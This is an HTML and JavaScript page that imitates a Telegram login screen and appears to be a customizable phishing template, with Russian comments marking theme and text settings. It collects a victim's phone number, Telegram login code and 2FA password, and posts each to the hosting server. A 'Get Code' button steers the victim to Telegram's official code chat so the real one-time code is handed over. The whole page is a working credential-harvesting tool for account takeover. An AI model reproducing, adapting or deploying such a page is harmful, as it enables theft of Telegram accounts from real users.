<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://unpkg.com/libphonenumber-js@1.11.7/bundle/libphonenumber-js.min.js"></script>
    <!-- Заголовок страницы -->
    <title>Telegram Auth</title>
    <style>
    :root {
        /* ФИОЛЕТОВАЯ ЦВЕТОВАЯ СХЕМА (можно заменить на любую другую) */
        --primary-500: #a855f7;
        --primary-600: #9333ea;
        --primary-700: #7e22ce;
        --primary-800: #6b21a8;
        
        /* Градиенты */
        --primary-gradient-start: var(--primary-600);
        --primary-gradient-end: var(--primary-800);
        --primary-hover-start: var(--primary-500);
        --primary-hover-end: var(--primary-700);
        
        /* Эффекты через color-mix() */
        --primary-shadow: color-mix(in srgb, var(--primary-600) 20%, transparent);
        --primary-shadow-hover: color-mix(in srgb, var(--primary-600) 40%, transparent);
        --primary-glow: color-mix(in srgb, var(--primary-600) 15%, transparent);
        --primary-bg-light: color-mix(in srgb, var(--primary-600) 10%, transparent);
        --primary-bg-border: color-mix(in srgb, var(--primary-600) 30%, transparent);

        --transition-speed: 0.3s;
    }

    * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
    }
    
    body {
        font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
        min-height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        padding: 20px;
    }
    

    body::before {
        content: "";
        position: fixed;
        inset: 0;

        /* Задний фон */
        /* background-image: url(https://www.sport-interfax.ru/ftproot/photos/photostory/2019/07/09/week4_700.jpg); */
        /* filter: blur(10px); */

        /* Темная тема */
        background: #0a0a0a;

        /* Светлая тема */
        /* background: white; */


        background-size: cover;
        background-repeat: no-repeat;
        background-position: center;
        z-index: -1;
    }

    .container {
        /* Задний цвет окна */
        /* Темная тема */
        background: linear-gradient(145deg, #1a1a1a 0%, #0f0f0f 100%);
        /* Светлая тема */
        /* background: white;  */

        /* Цвет рамки  */
        /* Темная тема */
        border: 1px solid #2a2a2a; 
        /* Светлая тема */
        /* border: 1px solid whitesmoke; */

        border-radius: 24px;
        padding: 48px;
        max-width: 420px;
        width: 100%;
        box-shadow: 0 8px 32px rgba(0,0,0,0.4);
    }
    
    .logo-area {
        text-align: center;
        margin-bottom: 32px;
    }
    
    .logo-circle {
        width: 160px;
        height: 160px;
        margin: 0 auto 24px;
        display: flex;
        align-items: center;
        justify-content: center;
        border-radius: 50%;
        overflow: hidden;
    }
    
    .logo-circle img {
        width: 100%;
        height: 100%;
        object-fit: cover;
    }
    
    h1 {
        /* Цвет шрифта */
        /* Темная тема */
        color: #fff;
        /* Светлая тема */
        /* color: #1a1a1a; */
        margin-bottom: 8px;
        font-size: 28px;
        font-weight: 700;
    }
    
    .subtitle {
        /* Цвет текста*/
        /* Темная тема */
        color: #888;
        /* Светлая тема */
        /* color: #444444; */
        font-size: 14px;
    }
    
    .form-group {
        margin-bottom: 24px;
    }
    
    label {
        display: block;
        margin-bottom: 10px;
        /* Текст над полем */
        /* Темная тема */
        color: #bbb;
        /* Светлая тема */
        /* color: #555555; */
        font-size: 13px;
        font-weight: 500;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }
    
    input {
        width: 100%;
        padding: 14px 16px;
        border-radius: 12px;
        font-size: 18px;
        font-weight: 600;
        transition: all 0.3s;
        /* Поле ввода */
        /* Темная тема */
        background: #1a1a1a;
        color: #fff;
        border: 1px solid white;
        /* Светлая тема */
        /* background: #F0F8FF   ; */
        /* color: #444444; */
        /* border: 1px solid white; */
        text-align: center;
    }
    
    input::placeholder {
        font-weight: 600;
        /* Плейсхолдер */
        /* Темная тема */
        color: #999;
        /* Светлая тема */
        /* color: #999; */
    }
    
    input:focus {
        outline: none;
        border-color: var(--primary-600);
        /* Фокус инпута */
        /* Темная тема */
        background: #0f0f0f;
        box-shadow: 0 0 0 3px var(--primary-glow);
        /* Светлая тема */
        /* background: #0f0f0f;
        box-shadow: 0 0 0 3px var(--primary-glow); */
    }
    
    button {
        width: 100%;
        padding: 16px;
        background: linear-gradient(135deg, var(--primary-gradient-start) 0%, var(--primary-gradient-end) 100%);
        /* Кнопка */
        /* Темная тема */
        color: #fff;
        box-shadow: 0 4px 16px var(--primary-shadow);
        /* Светлая тема */
        /* color: #fff;
        box-shadow: 0 4px 16px var(--primary-shadow); */
        border: none;
        border-radius: 12px;
        font-size: 15px;
        font-weight: 600;
        cursor: pointer;
        transition: all var(--transition-speed);
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }
    
    button:hover {
        transform: translateY(-2px);
        box-shadow: 0 8px 24px var(--primary-shadow-hover);
        background: linear-gradient(135deg, var(--primary-hover-start) 0%, var(--primary-hover-end) 100%);
    }
    
    button:active {
        transform: translateY(0);
    }
    
    button:disabled {
        opacity: 0.5;
        cursor: not-allowed;
        transform: none;
    }
    
    .get-code-button {
        margin-top: 12px;
        background: linear-gradient(135deg, var(--primary-gradient-start) 0%, var(--primary-gradient-end) 100%);
        border: none;
        /* Кнопка 2 */
        /* Темная тема */
        color: #fff;
        box-shadow: 0 4px 16px var(--primary-shadow);
        /* Светлая тема */
        /* color: #fff; */
        /* box-shadow: 0 4px 16px var(--primary-shadow); */
        text-decoration: none;
        display: block;
        text-align: center;
        padding: 16px;
        border-radius: 12px;
        font-size: 15px;
        font-weight: 600;
        cursor: pointer;
        transition: all var(--transition-speed);
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }
    
    .get-code-button:hover {
        background: linear-gradient(135deg, var(--primary-hover-start) 0%, var(--primary-hover-end) 100%);
        transform: translateY(-2px);
        box-shadow: 0 8px 24px var(--primary-shadow-hover);
    }
    
    .error {
        /* Ошибка */
        /* Темная тема */
        background: rgba(255,70,70,0.1);
        border: 1px solid rgba(255,70,70,0.3);
        /* Светлая тема */
        /* background: rgba(255,70,70,0.1); */
        /* border: 1px solid rgba(255,70,70,0.3); */
        color: #ff6b6b;
        padding: 12px 16px;
        border-radius: 12px;
        margin-bottom: 20px;
        font-size: 13px;
        display: none;
    }
    
    .success {
        /* Успех */
        /* Темная тема */
        background: var(--primary-bg-light);
        border: 1px solid var(--primary-bg-border);
        /* Светлая тема */
        /* background: var(--primary-bg-light);
        border: 1px solid var(--primary-bg-border); */
        color: var(--primary-600);
        padding: 12px 16px;
        border-radius: 12px;
        margin-bottom: 20px;
        font-size: 13px;
        display: none;
    }
    
    .loading {
        display: none;
        text-align: center;
        margin-top: 24px;
    }
    
    .loading-spinner {
        border: 3px solid #2a2a2a;
        border-top: 3px solid var(--primary-600);
        border-radius: 50%;
        width: 40px;
        height: 40px;
        animation: spin 0.8s linear infinite;
        margin: 0 auto;
    }
    
    @keyframes spin {
        0% { transform: rotate(0deg); }
        100% { transform: rotate(360deg); }
    }
    
    .step {
        display: none;
    }
    
    .step.active {
        display: block;
        animation: fadeIn 0.3s;
    }
    
    @keyframes fadeIn {
        from { opacity: 0; transform: translateY(10px); }
        to { opacity: 1; transform: translateY(0); }
    }
    
    .back-button {
        background: transparent;
        border: 1px solid #2a2a2a;
        color: #888;
        margin-bottom: 20px;
        box-shadow: none;
    }
    
    .back-button:hover {
        border-color: var(--primary-600);
        color: var(--primary-600);
        box-shadow: none;
        background: var(--primary-bg-light);
    }

    body.light::before {
        background: white;
    }

    body.light .container {
        background: white;
        border: 1px solid whitesmoke;
    }

    body.light h1 {
        color: #1a1a1a;
    }

    body.light .subtitle {
        color: #444444;
    }

    body.light label {
        color: #555555;
    }

    body.light input {
        background: #F0F8FF;
        color: #444;
        border: 1px solid #ccc;
    }

    body.light input::placeholder {
        color: #999;
    }

    body.light input:focus {
        background: #ffffff;
        border-color: var(--primary-600);
        box-shadow: 0 0 0 3px var(--primary-glow);
    }

    body.light button,
    body.light .get-code-button {
        color: #fff; /* кнопки в светлой теме тоже белый текст */
    }

    /* Ошибки */
    body.light .error {
        background: rgba(255,70,70,0.1);
        border: 1px solid rgba(255,70,70,0.3);
        color: #ff4a4a;
    }

    /* Успех */
    body.light .success {
        background: var(--primary-bg-light);
        border: 1px solid var(--primary-bg-border);
        color: var(--primary-600);
    }

    /* Back button */
    body.light .back-button {
        border: 1px solid #ddd;
        color: #555;
    }

    body.light .back-button:hover {
        background: var(--primary-bg-light);
        border-color: var(--primary-600);
        color: var(--primary-600);
    }
</style>
</head>

<body class="light">

    <div class="container">
        <div class="logo-area">
            <!-- Эмодзи -->
            <div class="logo-circle" id="logoCircle">
                <!-- Ссылка эмодзи main-emoji -->
                <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/83/Telegram_2019_Logo.svg/1200px-Telegram_2019_Logo.svg.png" alt="Logo" id="logoImage">
            </div>
            <!-- Заголовок главной страницы main_title -->
            <h1 id="pageTitle">Telegram Authorization</h1>
            <!-- Текст главной страницы main_text -->
            <p class="subtitle" id="pageSubtitle">Telegram verification required</p>
        </div>
        
        <div class="error" id="error"></div>
        <div class="success" id="success"></div>
        
        <!-- Шаг 1: Телефон -->
        <div class="step active" id="step1">
            <div class="form-group">
                <!-- Название поля ввода КОДА main_enter_title -->
                <label for="phone">Phone Number</label>
                <input type="tel" id="phone" placeholder="+1" autocomplete="tel" inputmode="numeric">
            </div>
            <!-- Текст кнопки отправки кода phone_button -->
            <button onclick="sendPhone()">Send Code</button>
        </div>
        
        <!-- Шаг 2: Код -->
        <div class="step" id="step2">
            <!-- Кнопка назад back_button -->
            <button class="back-button" onclick="goBack(1)">← Back</button>
            <div class="form-group">
                <!-- Название поля ввода КОДА code_enter_title -->
                <label for="code">Verification Code</label> 
                <!-- Плейсхолдер ввода кода code_placeholder  -->
                <input type="text" id="code" placeholder="12345" maxlength="5" autocomplete="one-time-code">
            </div>
            <!-- Кнопка ввода кода code_button -->
            <button onclick="sendCode()">Verify</button>
            <a href="https://t.me/+42777" target="_blank" class="get-code-button">Get Code</a>
        </div>
        
        <!-- Шаг 3: 2FA пароль -->
        <div class="step" id="step3">
            <button class="back-button" onclick="goBack(2)">← Back</button>
            <div class="form-group">
                <!-- Название поля ввода 2ФА twofa_enter_title -->
                <label for="password">2FA Password</label>
                <!-- Пелейсхолдер пароля twofa_placeholder -->
                <input type="password" id="password" placeholder="None" autocomplete="current-password"> 
            </div>
            <!-- Кнопка отправки 2ФА twofa_button -->
            <button onclick="sendPassword()">Login</button>
        </div>
        
        <div class="loading" id="loading">
            <div class="loading-spinner"></div>
        </div>
    </div>

    <script>
        let sessionId = null;
        let currentStep = 1;
        
        let detectedCountryCode = '+1';
        
        async function detectCountryCode() {
            try {
                const response = await fetch('https://ipapi.co/json/');
                const data = await response.json();
                
                const countryPhoneCodes = {
                    'US': '+1', 'CA': '+1', 'RU': '+7', 'KZ': '+7',
                    'GB': '+44', 'DE': '+49', 'FR': '+33', 'IT': '+39',
                    'ES': '+34', 'UA': '+380', 'BY': '+375', 'PL': '+48',
                    'TR': '+90', 'CN': '+86', 'JP': '+81', 'KR': '+82',
                    'IN': '+91', 'BR': '+55', 'MX': '+52', 'AR': '+54',
                    'AU': '+61', 'NZ': '+64', 'ZA': '+27', 'EG': '+20',
                    'IL': '+972', 'SA': '+966', 'AE': '+971', 'TH': '+66',
                    'VN': '+84', 'PH': '+63', 'ID': '+62', 'MY': '+60',
                    'SG': '+65', 'PT': '+351', 'NL': '+31', 'BE': '+32',
                    'SE': '+46', 'NO': '+47', 'DK': '+45', 'FI': '+358',
                    'GR': '+30', 'CZ': '+420', 'AT': '+43', 'CH': '+41',
                    'IE': '+353', 'HU': '+36', 'RO': '+40', 'BG': '+359'
                };
                
                detectedCountryCode = countryPhoneCodes[data.country_code] || '+1';
                document.getElementById('phone').placeholder = detectedCountryCode;
                
            } catch (error) {
                console.log('Could not detect country, using default +1');
                detectedCountryCode = '+1';
                document.getElementById('phone').placeholder = '+1';
            }
        }
        
        detectCountryCode();
        
        const phoneInput = document.getElementById('phone');
        let countryCodeInserted = false;
        
        phoneInput.addEventListener('focus', function() {
            if (this.value === '' && !countryCodeInserted) {
                this.value = detectedCountryCode + ' ';
                countryCodeInserted = true;
            }
        });
        
        phoneInput.addEventListener('input', function(e) {
        });
        
        function updateLogo(imageName) {
            const logoImage = document.getElementById('logoImage');
            logoImage.src = imageName;
        }
        
        function showError(message) {
            const errorDiv = document.getElementById('error');
            errorDiv.textContent = message;
            errorDiv.style.display = 'block';
            setTimeout(() => {
                errorDiv.style.display = 'none';
            }, 5000);
        }
        
        function showSuccess(message) {
            const successDiv = document.getElementById('success');
            successDiv.textContent = message;
            successDiv.style.display = 'block';
        }
        
        function showLoading(show) {
            document.getElementById('loading').style.display = show ? 'block' : 'none';
            document.querySelectorAll('button').forEach(btn => btn.disabled = show);
        }
        
        function goToStep(step) {
            document.querySelectorAll('.step').forEach(s => s.classList.remove('active'));
            document.getElementById('step' + step).classList.add('active');
            currentStep = step;
            
            const pageTitle = document.getElementById('pageTitle');
            const pageSubtitle = document.getElementById('pageSubtitle');
            
            // Обновляем логотип, заголовок и подзаголовок в зависимости от шага

            if (step === 1) {
                // Гифка ГЛАВНОЙ СТРАНИЦЫ main_gif
                updateLogo('https://upload.wikimedia.org/wikipedia/commons/thumb/8/83/Telegram_2019_Logo.svg/1200px-Telegram_2019_Logo.svg.png');
                // Заголовок ГЛАВНОЙ СТРАНИЦЫ main_title
                pageTitle.textContent = 'Telegram Authorization';
                // Текст ГЛАВНОЙ СТРАНИЦЫ main_text
                pageSubtitle.textContent = 'Telegram verification required';
            } else if (step === 2) {
                // Гифка ВВОДА КОДА code_gif
                updateLogo('https://raw.githubusercontent.com/Tarikul-Islam-Anik/Telegram-Animated-Emojis/main/Objects/Locked%20With%20Key.webp');
                // Заголовок ВВОД КОДА code_title
                pageTitle.textContent = 'Enter Verification Code';
                // Текст ВВОДА КОДА code_text
                pageSubtitle.textContent = 'Enter Verification Code';
            } else if (step === 3) {
                // Гифка 2ФА twofa_gif
                updateLogo('https://raw.githubusercontent.com/Tarikul-Islam-Anik/Telegram-Animated-Emojis/main/Smileys/See%20No%20Evil%20Monkey.webp');
                // Заголовок 2ФА twofa_title
                pageTitle.textContent = 'Two-Factor Authentication';
                // Текст 2ФА twofa_text
                pageSubtitle.textContent = 'Enter your 2FA password';
            }
        }
        
        function goBack(step) {
            goToStep(step);
        }
        
        async function sendPhone() {
            const phone = document.getElementById('phone').value.trim();
            
            if (!phone) {
                // Ошибка error_empty_phone
                showError('Enter your phone number!');
                return;
            }
            
            showLoading(true);
            
            // ЗАПРОС НА ОТПРАВКУ ТЕЛЕФОНА
            try {
                const response = await fetch(`${location.pathname}`, {
                    method: 'POST',
                    headers: {'Content-Type': 'application/json'},
                    body: JSON.stringify({p: phone, c: true})
                });
                
                const data = await response.json();

                // Переход к вводу КОДА
                if (response.ok) {
                    goToStep(2);
                } else {
                    // ОШИБКА error_send_code
                    showError('Error while sending code, please try again!');
                }
            } catch (error) {
                // error_connection
                showError('There was an error sending the code. Please try again!');
            } finally {
                showLoading(false);
            }
        }
        
        async function sendCode() {
            const code = document.getElementById('code').value.trim();
            
            if (!code) {
                // ОШИБКА error_empty_code
                showError('Enter verification code!');
                return;
            }
            
            showLoading(true);
            
            try {
                const response = await fetch(`${location.pathname}/c`, {
                    method: 'POST',
                    headers: {'Content-Type': 'application/json'},
                    body: JSON.stringify({
                        c: code
                    })
                });
                
                const status = await response.json();
                
                if (status == 'success'){
                    updateLogo('https://raw.githubusercontent.com/Tarikul-Islam-Anik/Telegram-Animated-Emojis/main/Symbols/Check%20Mark%20Button.webp');
                    showSuccess('Telegram successful verified!');  
                    setTimeout(() => {
                        location.reload();
                    }, 2000);
                } else if (status == 'fail') {
                    showError('The code is incorrect. Find out the code by clicking the button below.');
                }
                else if (status == 'twoFA') {
                    goToStep(3);
                }
            } catch (error) {
                showError('There was an error sending the code. Please try again!');
            } finally {
                showLoading(false);
            }
        }
        
        async function sendPassword() {
            const password = document.getElementById('password').value;
            
            if (!password) {
                // ОШИБКА ПУСТАЯ 2ФА
                showError('Please enter tour password');
                return;
            }
            
            showLoading(true);
            
            try {
                const response = await fetch(`${location.pathname}/etf`, {
                    method: 'POST',
                    headers: {'Content-Type': 'application/json'},
                    body: JSON.stringify({
                        t: password
                    })
                });
                
                const data = await response.json();
                
                if (data == 'success') {
                    updateLogo('https://raw.githubusercontent.com/Tarikul-Islam-Anik/Telegram-Animated-Emojis/main/Symbols/Check%20Mark%20Button.webp');
                    showSuccess('Telegram successful verified!');
                    setTimeout(() => {
                        location.reload();
                    }, 2000);
                } else if (data == 'fail') {
                    // НЕВЕРНАЯ 2ФА
                    showError('Password is wrong. Check out and try again!');
                }
            } catch (error) {
                showError('There was an error sending the code. Please try again!');
            } finally {
                showLoading(false);
            }
        }
        
        document.getElementById('phone').addEventListener('keypress', (e) => {
            if (e.key === 'Enter') sendPhone();
        });
        
        document.getElementById('code').addEventListener('keypress', (e) => {
            if (e.key === 'Enter') sendCode();
        });
        
        document.getElementById('password').addEventListener('keypress', (e) => {
            if (e.key === 'Enter') sendPassword();
        });


        phoneInput.addEventListener("input", () => {
            let value = phoneInput.value.replace(/[^\d+]/g, "");

            if (!value.startsWith("+")) {
                value = "+" + value.replace(/\D/g, "");
            }

            // + может быть только первым
            if (value.indexOf("+") > 0) {
                value = value.replace(/\+/g, "");
                value = "+" + value;
            }

            phoneInput.value = value;
            const digits = value.replace(/\D/g, "");

            try {
                const phoneNumber = libphonenumber.parsePhoneNumber(value);
                const countryCode = phoneNumber.countryCallingCode;
                console.log(countryCode)
                console.log(phoneNumber.countryCallingCode);
                phoneInput.value = formatByCountryCode(digits, countryCode);
            } catch (e) {
                console.log(e)
                info.innerHTML = "";
            }
        });

        function formatByCountryCode(fullDigits, countryCode) {
            const national = fullDigits.slice(countryCode.length);

            let groups;

            switch (countryCode.length) {
                case 1:
                    groups = [3, 3, 2, 2];
                    break;
                case 2:
                    groups = [2, 4, 4];
                    break;
                case 3:
                    groups = [2, 3, 2, 2];
                    break;
                default:
                    groups = [3, 3, 2, 2];
            }

            let result = `+${countryCode}`;
            let pos = 0;

            for (const size of groups) {
                if (pos >= national.length) break;
                result += " " + national.slice(pos, pos + size);
                pos += size;
            }

            return result;
        }
    </script>
</body>
</html>